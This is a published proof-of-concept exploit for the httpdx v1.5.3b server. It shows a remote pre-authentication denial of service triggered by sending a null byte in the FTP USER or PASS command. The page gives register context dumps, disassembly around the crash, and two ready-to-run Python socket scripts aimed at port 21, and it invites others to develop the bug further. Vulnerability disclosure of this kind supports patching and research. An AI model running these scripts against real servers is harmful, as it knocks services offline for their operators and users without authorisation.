扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 |
# Title: httpdx v1.5.3b Multiple - Remote Pre-Authentication DoS (PoC crash) # From: The eh?-Team || The Great White Fuzz (we're not sure yet) # Found by: loneferret # Hat's off to dookie2000ca # Date: 13/03/2010 # Software link: http://httpdx.sourceforge.net/downloads/ # Tested on: Windows XP SP3 Professional # Nod to the Exploit-DB Team #Not to beat a dead horse, but when I saw the latest release notes #about how he fixed a few security bugs. I figured I'd give this one #another go at it. #He did fix quite a few bugs, but he created this one in the process. #I've included 2 PoCs for both the USER & PASS command. #As always, if anyone wants to take this further, go right ahead. #============================USER Command=============================== #CONTEXT DUMP # EIP: 77c47b79 mov [edi],eax # EAX: 00000000 ( 0) -> N/A # EBX: fffffffa (4294967290) -> N/A # ECX: 3ffff68b (1073739403) -> N/A # EDX: 7efeff1f (2130640671) -> N/A # EDI: 003f0000 ( 4128768) -> N/A # ESI: 003eca36 ( 4114998) -> (heap) # EBP: 0022dde4 ( 2285028) -> "@(>t"@@(>@@(>@@(>(>(> (stack) # ESP: 0022ba9c ( 2275996) -> 0> (stack) # +00: 003eca30 ( 4114992) -> USER (heap) # +04: 00000000 ( 0) -> N/A # +08: 00000000 ( 0) -> N/A # +0c: 0040d663 ( 4249187) -> N/A # +10: 003eda30 ( 4119088) -> (heap) # +14: 003eca35 ( 4114997) -> (heap) #disasm around: # 0x77c47b61 and edx,0xff # 0x77c47b67 mov [edi],edx # 0x77c47b69 jmp 0x77c47b6f # 0x77c47b6b xor edx,edx # 0x77c47b6d mov [edi],edx # 0x77c47b6f add edi,0x4 # 0x77c47b72 xor eax,eax # 0x77c47b74 dec ecx # 0x77c47b75 jz 0x77c47b81 # 0x77c47b77 xor eax,eax # 0x77c47b79 mov [edi],eax # 0x77c47b7b add edi,0x4 # 0x77c47b7e dec ecx # 0x77c47b7f jnz 0x77c47b79 # 0x77c47b81 and ebx,0x3 # 0x77c47b84 jnz 0x77c47b0b # 0x77c47b86 mov eax,[esp+0x10] # 0x77c47b8a pop ebx # 0x77c47b8b pop esi # 0x77c47b8c pop edi # 0x77c47b8d ret #stack unwind: # httpdx.exe:0040ffec # kernel32.dll:7c80b713 #SEH unwind: # ffffffff -> kernel32.dll:7c839ac0 push ebp #!/usr/bin/python import socket buffer = "\000" s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) connect=s.connect(('xxx.xxx.xxx.xxx',21)) #Remember to put in the server's address s.recv(1024) s.send('USER '+ buffer +'\r\n') s.recv(1024) s.close #============================PASS Command=============================== #CONTEXT DUMP # EIP: 77c47b79 mov [edi],eax # EAX: 00000000 ( 0) -> N/A # EBX: fffffffa (4294967290) -> N/A # ECX: 3ffed77d (1073665917) -> N/A # EDX: 7efeff1f (2130640671) -> N/A # EDI: 00c63000 ( 12988416) -> N/A # ESI: 00c17cfe ( 12680446) -> (heap) # EBP: 0186dde4 ( 25615844) -> @|t@@|@@|@@||| (stack) # ESP: 0186ba9c ( 25606812) -> |)@| PASS (heap) # +04: 00000000 ( 0) -> N/A # +08: 00000000 ( 0) -> N/A # +0c: 0040d729 ( 4249385) -> N/A # +10: 00c18df8 ( 12684792) -> (heap) # +14: 00c17cfd ( 12680445) -> (heap) #disasm around: # 0x77c47b61 and edx,0xff # 0x77c47b67 mov [edi],edx # 0x77c47b69 jmp 0x77c47b6f # 0x77c47b6b xor edx,edx # 0x77c47b6d mov [edi],edx # 0x77c47b6f add edi,0x4 # 0x77c47b72 xor eax,eax # 0x77c47b74 dec ecx # 0x77c47b75 jz 0x77c47b81 # 0x77c47b77 xor eax,eax # 0x77c47b79 mov [edi],eax # 0x77c47b7b add edi,0x4 # 0x77c47b7e dec ecx # 0x77c47b7f jnz 0x77c47b79 # 0x77c47b81 and ebx,0x3 # 0x77c47b84 jnz 0x77c47b0b # 0x77c47b86 mov eax,[esp+0x10] # 0x77c47b8a pop ebx # 0x77c47b8b pop esi # 0x77c47b8c pop edi # 0x77c47b8d ret #stack unwind: # httpdx.exe:0040ffec # kernel32.dll:7c80b713 #SEH unwind: # ffffffff -> kernel32.dll:7c839ac0 push ebp #!/usr/bin/python import socket buffer = "\000" s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) connect=s.connect(('xxx.xxx.xxx.xxx',21)) #Remember to put in the server's address s.recv(1024) s.send('USER test\r\n') s.recv(1024) s.send('PASS ' + buffer + '\r\n') s.recv(1024) s.close |
体验盒子
